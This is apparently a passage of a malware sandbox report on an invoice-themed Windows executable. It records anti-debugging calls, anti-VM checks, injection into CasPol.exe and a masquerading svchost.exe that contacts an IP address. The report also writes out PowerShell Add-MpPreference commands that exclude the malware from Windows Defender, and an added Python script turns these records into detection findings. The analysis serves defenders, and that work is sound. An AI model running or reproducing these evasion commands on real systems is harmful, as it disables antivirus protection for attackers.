        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4778
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1763
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4493
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2472
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 1502
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: threadDelayed 8058
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Window / User API: foregroundWindowGot 589
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6432 | Thread sleep time: -16602069666338586s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6720 | Thread sleep time: -13835058055282155s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 6448 | Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
        Source: powershell.exe, 00000001.00000003.824518688.0000000005872000.00000004.00000001.sdmp | Binary or memory string: k:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
        Source: powershell.exe, 00000001.00000003.824518688.0000000005872000.00000004.00000001.sdmp | Binary or memory string: Hyper-V
        Source: explorer.exe, 00000012.00000002.917668175.00000000008C6000.00000004.00000020.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: explorer.exe, 00000012.00000002.917668175.00000000008C6000.00000004.00000020.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
        Source: WerFault.exe, 00000011.00000002.837375808.0000000004528000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: svchost.exe, 0000000C.00000002.978705659.0000000006400000.00000002.00000001.sdmp, CasPol.exe, 0000000D.00000002.954963691.00000000067B0000.00000002.00000001.sdmp, WerFault.exe, 00000011.00000002.838737739.00000000047F0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Process information queried: ProcessInformation

        Anti Debugging:

        Contains functionality to hide a thread from the debugger
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Code function: 0_2_08A269B0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,08A2706F,00000000,00000000
        Hides threads from debuggers
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Thread information set: HideFromDebugger (13 identical entries collapsed)
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Process queried: DebugPort (2 identical entries collapsed)
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Code function: 3_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Process token adjusted: Debug
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe | Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Process token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Memory allocated: page read and write | page guard
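        The anti-debugging evidence above (an NtSetInformationThread call whose information class is 0x11, which is ThreadHideFromDebugger, plus the ProcessDebugPort queries) and the Windows Defender exclusion commands listed under HIPS / PFW / Operating System Protection Evasion further down are the kind of records an analyst turns into triage rules. The Python below is an added example and is not part of the Joe Sandbox report or of the sample: it parses evidence lines into findings and flags a system-binary file name running outside System32/SysWOW64 (the xrpSendfsxM\svchost.exe seen throughout this report), the hide-from-debugger call, the Add-MpPreference exclusion, and a network connection made by the masquerading process. The sample lines are constructed from entries on this page; the "Source: <process> | <event>" layout, the rule names and the category labels are this example's own assumptions, not the sandbox's schema.

```python
"""Triage pass over sandbox evidence lines (added example, not the report's code)."""
import re
from collections import Counter
from dataclasses import dataclass
from pathlib import PureWindowsPath

# THREADINFOCLASS value seen as the second NtSetInformationThread argument in
# the report (00000011): 0x11 is ThreadHideFromDebugger.
THREAD_HIDE_FROM_DEBUGGER = 0x11

# Where a genuine copy of these Windows binaries is expected to live.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe"}

# Constructed from entries visible in this report. The "Source: <process> | <event>"
# layout is this example's own assumption, not the sandbox's export format.
SAMPLE_EVIDENCE = [
    r"Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Code function: 0_2_08A269B0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,08A2706F,00000000,00000000",
    r"Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe | Process queried: DebugPort",
    r"Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Process token adjusted: Debug",
    r"Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Network Connect: 172.67.172.17 80",
    r"Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX",
    r"Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force",
]

LINE_RE = re.compile(r"^Source:\s*(?P<source>.+?)\s*\|\s*(?P<event>.+)$")
NTSIT_RE = re.compile(r"NtSetInformationThread\s+[^,]*,([0-9A-Fa-f]+)")
EXCLUSION_RE = re.compile(r"Add-MpPreference\s+-ExclusionPath\s+'([^']+)'", re.IGNORECASE)
NET_RE = re.compile(r"Network Connect:\s*(\S+)\s+(\d+)")


@dataclass(frozen=True)
class Finding:
    category: str
    source: str
    detail: str


def is_masquerading(image_path: str) -> bool:
    """A system-binary file name running from outside System32/SysWOW64."""
    p = PureWindowsPath(image_path)
    return p.name.lower() in SYSTEM_BINARY_NAMES and str(p.parent).lower() not in SYSTEM_DIRS


def hides_from_debugger(event: str) -> bool:
    """True for an NtSetInformationThread call whose information class is 0x11."""
    m = NTSIT_RE.search(event)
    return bool(m) and int(m.group(1), 16) == THREAD_HIDE_FROM_DEBUGGER


def triage(lines):
    """Map evidence lines to de-duplicated findings, in first-seen order."""
    findings, seen = [], set()

    def add(category, source, detail):
        f = Finding(category, source, detail)
        if f not in seen:
            seen.add(f)
            findings.append(f)

    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # not in the expected layout; skip rather than guess
        source, event = m.group("source"), m.group("event")
        masquerading = is_masquerading(source)
        if masquerading:
            add("masquerading", source, "system binary name outside System32/SysWOW64")
        if hides_from_debugger(event):
            add("anti-debug", source, "NtSetInformationThread(ThreadHideFromDebugger)")
        elif "HideFromDebugger" in event:
            add("anti-debug", source, "thread hidden from debugger")
        elif "Process queried: DebugPort" in event:
            add("anti-debug", source, "ProcessDebugPort query")
        excl = EXCLUSION_RE.search(event)
        if excl:
            add("defense-evasion", source, f"Defender exclusion added for {excl.group(1)}")
        net = NET_RE.search(event)
        if net and masquerading:
            add("c2-candidate", source, f"{net.group(1)}:{net.group(2)} from masquerading process")
    return findings


def summarize(findings):
    """Count findings per category."""
    return dict(Counter(f.category for f in findings))


if __name__ == "__main__":
    for f in triage(SAMPLE_EVIDENCE):
        print(f"[{f.category:15}] {f.source}  {f.detail}")
```

        Run it directly to print the findings for the embedded lines; the per-category counts from summarize() are what a scoring layer would consume. The masquerading check keys on the parent directory rather than on the full path because the random directory name (xrpSendfsxM in this report) changes from infection to infection, while a svchost.exe anywhere under C:\Windows\Microsoft.NET\Framework is wrong regardless of that name.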

        HIPS / PFW / Operating System Protection Evasion:

        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Network Connect: 172.67.172.17 80
        Adds a directory exclusion to Windows Defender
        Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 420000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 422000
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 79C008
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 3_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
